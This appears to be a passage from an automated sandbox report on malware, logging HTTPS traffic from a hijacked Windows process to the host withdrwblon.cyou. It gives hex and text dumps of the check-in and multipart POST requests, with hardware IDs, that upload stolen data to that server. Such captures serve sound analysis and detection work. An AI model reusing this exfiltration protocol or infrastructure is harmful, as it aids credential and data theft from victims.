                                                                Date: Thu, 24 Oct 2024 19:51:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=l50bgvqv1mk0tnca6e12jq311h; expires=Mon, 17 Feb 2025 13:37:47 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=msxbNEhYMMOeAGQo20zvtG3djmPD%2BgF7Yaym1MuTqV9Pg1a%2BXyk89ATXnKFH6DsLNJ%2FU1MP5TbACKpBbcCIvuno6XquLUYpN2Kqks3THmBCbarRMwNpATOnfT2PJKP1uyFPy"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c7ff1ad5a467e-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1475292&cwnd=251&unsent_bytes=0&cid=6a4cfda64327edee&ts=631&x=0"
                                                                2024-10-24 19:51:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                Data Ascii: 2ok
                                                                2024-10-24 19:51:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749700188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:09 UTC264OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 80
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:09 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                2024-10-24 19:51:09 UTC1006INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=n46njjdlad131n1mq5s699lu7o; expires=Mon, 17 Feb 2025 13:37:48 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNWxcB7Wf8FexnGahs2GvHSaluWiU43cyqNxi%2BeTDBMYteYvG5Lpde5K1rAlNHjlTn%2F4eTpi2AhieNS%2Bo3PEjdLWqUFxxxCd58k7lNPwWUBUycPQA2LsFll5DuJC9EEoRUSe"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c7ff9fd3bad89-ATL
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=20250&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=980&delivery_rate=142920&cwnd=32&unsent_bytes=0&cid=253ee516675c184e&ts=464&x=0"
                                                                2024-10-24 19:51:09 UTC363INData Raw: 34 32 65 34 0d 0a 44 7a 6a 58 36 4a 6e 4e 48 76 6d 77 2f 4f 52 37 4c 32 53 7a 73 57 62 65 56 4e 56 30 37 30 53 42 77 43 38 54 65 36 33 39 2f 6e 46 30 47 71 48 4b 6f 2f 6b 79 32 38 4f 5a 78 6b 46 4a 42 64 2f 43 41 2f 4a 32 74 42 44 4e 66 75 65 68 51 32 41 65 67 64 2b 49 48 43 30 43 73 59 6e 31 76 6e 76 56 6b 70 6d 63 57 52 55 2f 79 4a 4d 44 73 48 62 76 56 6f 6f 75 34 36 46 44 63 52 72 47 6b 6f 34 64 62 46 43 37 6a 2f 47 6f 66 5a 33 52 6b 49 6b 65 53 67 48 53 32 77 69 33 4f 62 30 5a 7a 57 69 6a 70 56 55 78 51 59 2b 77 6d 77 56 75 64 62 61 62 38 75 39 6a 31 63 76 65 67 52 55 4e 58 70 48 51 41 37 77 34 73 78 43 45 4c 4f 6d 6f 53 33 41 66 78 34 32 58 46 32 64 51 74 59 7a 77 6f 6e 53 4a 33 4a 71 4f 46 55 77 4c 30 70 4e 4b 2f 44 47 76 56 74 56 6d 73 4a 42 4f 59
                                                                Data Ascii: 42e4DzjX6JnNHvmw/OR7L2SzsWbeVNV070SBwC8Te639/nF0GqHKo/ky28OZxkFJBd/CA/J2tBDNfuehQ2Aegd+IHC0CsYn1vnvVkpmcWRU/yJMDsHbvVoou46FDcRrGko4dbFC7j/GofZ3RkIkeSgHS2wi3Ob0ZzWijpVUxQY+wmwVudbab8u9j1cvegRUNXpHQA7w4sxCELOmoS3Afx42XF2dQtYzwonSJ3JqOFUwL0pNK/DGvVtVmsJBOY
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 6b 67 55 32 74 6f 4a 73 54 61 36 48 49 49 6c 34 36 56 48 65 78 62 46 6d 35 45 65 61 31 71 31 79 72 58 76 65 34 4f 53 78 73 59 36 53 42 62 57 33 78 4c 2b 44 50 63 4a 77 7a 2b 6a 70 55 45 78 51 59 2b 58 6d 52 42 75 55 62 71 4a 38 36 52 75 6d 38 43 59 69 78 78 66 41 4e 54 64 44 72 38 6b 76 52 69 4c 4a 65 71 70 52 48 51 65 79 39 2f 53 55 32 70 43 39 64 4b 37 6a 6e 47 51 33 70 53 52 47 51 30 5a 6e 38 70 45 75 7a 72 33 54 73 30 69 34 71 5a 4d 64 52 66 42 6d 35 41 56 59 31 65 36 6a 50 47 76 65 35 48 61 6c 6f 63 55 52 67 6e 52 31 67 6d 34 4d 4c 73 58 69 47 61 74 34 6b 70 70 57 5a 66 66 73 68 52 75 53 50 65 2f 2b 4b 46 79 6e 4d 54 65 6d 56 64 55 52 74 62 66 52 4f 52 32 75 52 4f 43 4e 4f 4b 77 53 48 38 4c 77 35 71 61 48 6d 35 55 74 59 2f 38 6f 6e 4b 64 31 5a 32 4f
                                                                Data Ascii: kgU2toJsTa6HIIl46VHexbFm5Eea1q1yrXve4OSxsY6SBbW3xL+DPcJwz+jpUExQY+XmRBuUbqJ86Rum8CYixxfANTdDr8kvRiLJeqpRHQey9/SU2pC9dK7jnGQ3pSRGQ0Zn8pEuzr3Ts0i4qZMdRfBm5AVY1e6jPGve5HalocURgnR1gm4MLsXiGat4kppWZffshRuSPe/+KFynMTemVdURtbfROR2uROCNOKwSH8Lw5qaHm5UtY/8onKd1Z2O
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 62 66 52 4f 52 32 75 78 2b 4e 4c 65 6d 6d 54 58 59 55 79 70 79 62 45 47 42 64 76 34 54 38 71 33 43 53 33 35 69 47 48 6b 6b 44 77 39 59 4e 73 44 72 33 57 4d 30 68 2b 2b 49 56 4d 54 62 49 69 5a 38 38 62 6b 75 38 79 75 54 68 5a 64 76 56 6b 73 5a 42 44 51 48 55 32 77 2b 36 50 72 63 45 69 43 6a 6f 6f 30 64 33 47 4d 4b 54 6d 68 4e 73 57 72 4f 47 2b 36 68 37 69 63 43 62 67 41 74 48 52 70 2b 54 41 36 52 32 37 31 61 37 4e 76 53 7a 57 7a 4d 73 7a 4a 47 53 46 48 73 61 71 73 54 69 37 33 75 58 6b 73 62 47 45 6b 30 4b 31 74 73 43 75 44 36 34 47 59 51 30 34 71 35 44 59 78 37 50 6c 70 49 63 59 56 4f 34 6a 66 61 6b 64 70 62 57 6d 59 64 5a 41 30 62 57 79 30 54 6b 64 6f 45 47 67 43 72 4e 71 55 46 34 57 64 44 52 68 56 4e 71 56 76 58 53 75 36 74 77 6b 39 69 52 6a 78 4e 48 43
                                                                Data Ascii: bfROR2ux+NLemmTXYUypybEGBdv4T8q3CS35iGHkkDw9YNsDr3WM0h++IVMTbIiZ88bku8yuThZdvVksZBDQHU2w+6PrcEiCjoo0d3GMKTmhNsWrOG+6h7icCbgAtHRp+TA6R271a7NvSzWzMszJGSFHsaqsTi73uXksbGEk0K1tsCuD64GYQ04q5DYx7PlpIcYVO4jfakdpbWmYdZA0bWy0TkdoEGgCrNqUF4WdDRhVNqVvXSu6twk9iRjxNHC
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 7a 64 76 6c 57 69 6a 36 6a 2b 67 31 65 50 76 72 64 76 53 6b 74 52 66 75 54 75 36 68 77 32 34 72 65 69 68 70 42 44 74 37 56 44 62 41 38 76 68 32 42 4c 65 65 75 52 48 51 66 7a 70 71 5a 45 6d 6c 57 76 34 7a 34 72 48 4f 55 33 5a 62 47 56 77 30 42 79 5a 4e 63 2f 42 4f 67 48 59 4d 67 6f 37 30 44 61 46 6e 49 6b 39 78 4c 4c 56 61 38 6a 50 32 71 63 4a 72 55 6c 6f 4d 52 53 51 66 58 31 51 65 7a 4d 72 49 58 67 69 4c 76 72 45 64 77 47 4d 4f 55 6b 78 68 6f 47 76 76 4b 2f 4c 63 38 77 35 4b 76 68 51 39 61 46 74 32 54 47 2f 49 76 39 78 47 42 5a 72 76 69 54 47 4d 54 78 5a 47 5a 48 47 68 5a 75 6f 33 32 71 58 43 52 32 35 61 41 46 6b 51 55 30 74 38 4b 75 7a 69 37 47 49 41 73 34 4b 38 4e 50 31 6e 49 68 39 78 4c 4c 58 61 79 68 39 57 6b 63 4a 79 53 67 63 67 41 44 51 48 64 6b 31
                                                                Data Ascii: zdvlWij6j+g1ePvrdvSktRfuTu6hw24reihpBDt7VDbA8vh2BLeeuRHQfzpqZEmlWv4z4rHOU3ZbGVw0ByZNc/BOgHYMgo70DaFnIk9xLLVa8jP2qcJrUloMRSQfX1QezMrIXgiLvrEdwGMOUkxhoGvvK/Lc8w5KvhQ9aFt2TG/Iv9xGBZrviTGMTxZGZHGhZuo32qXCR25aAFkQU0t8Kuzi7GIAs4K8NP1nIh9xLLXayh9WkcJySgcgADQHdk1
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 49 49 6f 32 38 36 45 50 51 41 2f 4d 69 5a 63 65 59 52 71 71 78 4f 4c 76 65 35 65 53 78 73 59 66 51 67 2f 53 33 41 57 31 4f 72 6f 54 68 43 50 69 70 45 6c 37 45 38 2b 5a 6d 68 4a 6f 55 4c 61 4c 38 61 5a 37 6b 39 57 64 6c 46 6b 44 52 74 62 4c 52 4f 52 32 6e 68 47 66 4b 50 50 69 55 6a 38 41 6a 35 69 51 55 7a 55 61 73 59 44 30 71 33 75 58 31 4a 75 41 46 45 77 4a 30 4e 4d 4c 75 44 32 2b 45 49 77 72 35 71 39 4a 59 78 50 45 6b 4a 41 61 59 56 66 31 78 4c 75 6f 5a 4e 75 4b 33 72 63 55 51 77 6a 57 78 55 53 6a 65 4b 35 57 69 69 71 6a 2b 67 31 77 46 63 43 63 6b 78 42 75 57 37 2b 59 36 61 4e 31 6b 39 65 53 6a 52 64 4c 46 4e 66 63 44 62 38 31 76 68 47 46 4b 75 6d 68 53 6a 46 58 6a 35 69 45 55 7a 55 61 6c 70 33 72 6f 6a 79 45 6e 49 66 47 48 6b 46 47 69 5a 4d 4d 73 54 36
                                                                Data Ascii: IIo286EPQA/MiZceYRqqxOLve5eSxsYfQg/S3AW1OroThCPipEl7E8+ZmhJoULaL8aZ7k9WdlFkDRtbLROR2nhGfKPPiUj8Aj5iQUzUasYD0q3uX1JuAFEwJ0NMLuD2+EIwr5q9JYxPEkJAaYVf1xLuoZNuK3rcUQwjWxUSjeK5Wiiqj+g1wFcCckxBuW7+Y6aN1k9eSjRdLFNfcDb81vhGFKumhSjFXj5iEUzUalp3rojyEnIfGHkFGiZMMsT6
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 2b 71 6d 52 58 49 5a 79 35 75 62 46 6d 35 57 76 6f 33 34 6f 48 69 53 33 4a 65 4a 57 51 4e 47 31 73 74 45 35 48 61 57 44 59 34 71 37 75 4a 53 50 77 43 50 6d 4a 42 54 4e 52 71 35 68 50 36 76 64 70 33 57 6d 34 41 54 53 41 62 61 30 41 75 34 4d 4c 4d 5a 6a 53 33 71 6f 30 74 30 45 38 53 5a 6b 52 42 72 58 50 58 45 75 36 68 6b 32 34 72 65 70 67 4a 41 43 74 61 54 47 2f 49 76 39 78 47 42 5a 72 76 69 52 6e 30 64 79 4a 2b 52 45 47 56 66 73 59 44 2b 72 33 53 4a 32 70 36 42 43 31 38 47 32 4e 59 49 76 7a 61 7a 45 49 51 67 34 4b 59 4e 50 31 6e 49 68 39 78 4c 4c 58 65 35 6a 64 4b 6f 5a 39 76 4e 30 4a 39 5a 53 67 71 52 69 30 53 39 50 62 30 5a 67 43 58 6c 6f 55 5a 30 45 38 36 59 6c 42 35 2f 57 62 71 46 2f 36 39 7a 6e 64 53 66 69 52 39 4b 44 39 44 62 41 2f 78 34 39 78 47 56
                                                                Data Ascii: +qmRXIZy5ubFm5Wvo34oHiS3JeJWQNG1stE5HaWDY4q7uJSPwCPmJBTNRq5hP6vdp3Wm4ATSAba0Au4MLMZjS3qo0t0E8SZkRBrXPXEu6hk24repgJACtaTG/Iv9xGBZrviRn0dyJ+REGVfsYD+r3SJ2p6BC18G2NYIvzazEIQg4KYNP1nIh9xLLXe5jdKoZ9vN0J9ZSgqRi0S9Pb0ZgCXloUZ0E86YlB5/WbqF/69zndSfiR9KD9DbA/x49xGV
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 64 38 48 39 69 4f 30 41 5a 75 56 4c 75 4e 37 65 38 79 32 39 33 65 33 69 41 4e 54 70 48 73 53 76 77 75 39 30 37 4e 45 2b 43 73 51 33 59 50 33 74 4b 37 43 57 42 63 6f 70 75 37 34 54 79 64 6b 73 62 57 56 77 30 43 77 4a 4e 63 37 47 54 73 51 39 35 78 73 2f 42 53 50 77 43 50 69 64 78 4c 50 78 54 31 6d 4c 76 33 50 4e 7a 52 6a 4a 51 66 54 68 44 53 6c 44 71 43 47 4c 41 51 69 43 48 7a 34 47 4e 36 44 63 6a 66 30 6c 4e 69 47 75 32 7a 75 2b 63 38 70 4a 7a 65 6e 6c 6b 56 52 75 54 51 43 72 49 78 6f 51 66 41 43 4f 53 6b 53 48 59 4a 6a 62 47 58 42 32 6f 61 2b 38 72 39 37 79 54 4c 6e 4e 36 43 43 41 31 65 67 59 46 66 36 57 58 67 52 74 38 35 72 62 73 4e 5a 31 6d 58 7a 64 4a 54 66 78 72 74 79 72 79 73 62 6f 6e 55 6e 5a 41 61 43 6a 6a 76 30 42 4b 78 4f 62 77 58 73 78 6a 4e 72
                                                                Data Ascii: d8H9iO0AZuVLuN7e8y293e3iANTpHsSvwu907NE+CsQ3YP3tK7CWBcopu74TydksbWVw0CwJNc7GTsQ95xs/BSPwCPidxLPxT1mLv3PNzRjJQfThDSlDqCGLAQiCHz4GN6Dcjf0lNiGu2zu+c8pJzenlkVRuTQCrIxoQfACOSkSHYJjbGXB2oa+8r97yTLnN6CCA1egYFf6WXgRt85rbsNZ1mXzdJTfxrtyrysbonUnZAaCjjv0BKxObwXsxjNr
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 42 6d 49 6f 43 49 48 32 37 6a 66 71 35 62 49 7a 64 30 61 67 76 62 45 61 66 6b 77 4c 38 62 75 56 59 7a 53 4c 79 34 68 55 68 53 35 54 4b 7a 30 51 39 43 4b 72 45 34 75 39 71 32 34 72 4d 79 46 6c 66 52 6f 6d 54 51 37 38 6b 70 52 43 4f 4d 4f 44 6c 63 30 38 2b 77 5a 69 64 42 58 31 58 75 61 76 34 76 6e 61 6c 37 49 75 46 46 30 4d 42 78 38 4a 45 38 6e 61 34 56 74 55 66 6f 2b 6f 4e 54 6c 65 50 68 39 78 4c 4c 57 2b 32 68 50 57 6f 61 6f 71 66 75 59 67 65 54 42 44 42 33 67 69 64 4e 61 59 63 7a 57 69 6a 70 41 30 70 53 34 48 66 6d 41 49 74 41 75 58 59 6f 50 6f 76 7a 49 4c 4d 6d 56 64 55 52 73 65 54 58 4f 35 34 39 77 54 4e 66 71 50 6c 54 6d 4d 4c 79 5a 79 4b 45 43 70 6b 69 36 2f 73 72 47 79 64 30 61 43 34 4d 6b 45 41 31 73 6b 44 75 68 43 58 56 73 4e 6d 37 4f 49 56 53 46
                                                                Data Ascii: BmIoCIH27jfq5bIzd0agvbEafkwL8buVYzSLy4hUhS5TKz0Q9CKrE4u9q24rMyFlfRomTQ78kpRCOMODlc08+wZidBX1Xuav4vnal7IuFF0MBx8JE8na4VtUfo+oNTlePh9xLLW+2hPWoaoqfuYgeTBDB3gidNaYczWijpA0pS4HfmAItAuXYoPovzILMmVdURseTXO549wTNfqPlTmMLyZyKECpki6/srGyd0aC4MkEA1skDuhCXVsNm7OIVSF
                                                                2024-10-24 19:51:09 UTC1369INData Raw: 55 33 55 61 37 63 72 57 76 58 75 4c 30 64 79 6a 49 77 38 33 78 39 41 45 73 6a 48 33 43 63 4d 2f 6f 37 51 4e 4b 55 71 42 33 34 35 54 4e 52 72 79 68 50 61 75 66 35 58 52 6a 4a 51 66 54 68 44 53 6c 44 71 43 47 62 77 58 6e 53 76 79 72 30 6c 6e 4a 2f 47 34 6d 68 5a 71 5a 49 75 39 36 71 68 73 32 66 53 64 6b 42 6f 4e 53 4a 48 4c 52 4f 52 32 6b 42 43 49 49 61 50 73 44 58 56 5a 6c 39 2b 7a 47 47 78 4b 75 4a 76 32 71 32 72 5a 39 5a 69 44 48 67 31 49 6b 64 39 45 35 48 61 34 42 34 6f 67 35 71 55 42 64 67 50 49 33 39 4a 54 59 78 72 74 79 76 53 2b 65 35 33 58 6d 63 6f 66 51 77 69 52 7a 45 71 6c 64 71 46 57 31 58 57 74 34 6c 38 78 51 59 2f 59 6b 68 35 73 57 62 75 4a 36 62 31 36 6d 4d 53 64 77 53 64 7a 4a 73 48 51 45 4c 73 48 75 68 4b 62 4d 2b 43 79 53 6b 38 6e 37 34 2b
                                                                Data Ascii: U3Ua7crWvXuL0dyjIw83x9AEsjH3CcM/o7QNKUqB345TNRryhPauf5XRjJQfThDSlDqCGbwXnSvyr0lnJ/G4mhZqZIu96qhs2fSdkBoNSJHLROR2kBCIIaPsDXVZl9+zGGxKuJv2q2rZ9ZiDHg1Ikd9E5Ha4B4og5qUBdgPI39JTYxrtyvS+e53XmcofQwiRzEqldqFW1XWt4l8xQY/Ykh5sWbuJ6b16mMSdwSdzJsHQELsHuhKbM+CySk8n74+


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749701188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:10 UTC282OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 12845
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:10 UTC12845OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
                                                                2024-10-24 19:51:11 UTC1022INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=gst9lrtkj3el6mheetgm8suk5i; expires=Mon, 17 Feb 2025 13:37:50 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBf2PZ3v8lbg5TwMhhEnXS1Ltc%2BFlS%2BJbveBctSrzH0a6%2FMlza%2BHjrr0kshfEwHErLvWcaMm%2B8t0GeAD%2FKwVeS3%2Br4KwvDMZ0uixYh2Af%2Bd8iG%2BFQxbz7G1vBjVjEvjy4FK2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c80043fff346e-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13785&delivery_rate=2203957&cwnd=251&unsent_bytes=0&cid=80755e9d5bce2f7a&ts=626&x=0"
                                                                2024-10-24 19:51:11 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                Data Ascii: 11ok 173.254.250.71
                                                                2024-10-24 19:51:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749702188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:12 UTC282OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 15077
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:12 UTC15077OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
                                                                2024-10-24 19:51:13 UTC1019INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 19:51:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=t2o6oajbsa5ufosp2k291cai3j; expires=Mon, 17 Feb 2025 13:37:51 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E58H7y2mm4sEflq27VFSP6RXaXDnjQErWAma8Tq7HEvYunhZkrx%2BBc9Q8x9T1pgteTkc%2FKNSX%2B4Anc1LoVrrz%2BSGPGo1oWLhyktBl%2FwGJaio7%2Bwq1WtH8Fxpta%2FQobDCexvA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d7c800fabf12cb0-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16017&delivery_rate=2028011&cwnd=251&unsent_bytes=0&cid=3eb3ecafe1550b54&ts=683&x=0"
                                                                2024-10-24 19:51:13 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                Data Ascii: 11ok 173.254.250.71
                                                                2024-10-24 19:51:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749709188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:14 UTC282OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 20402
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:14 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f
                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
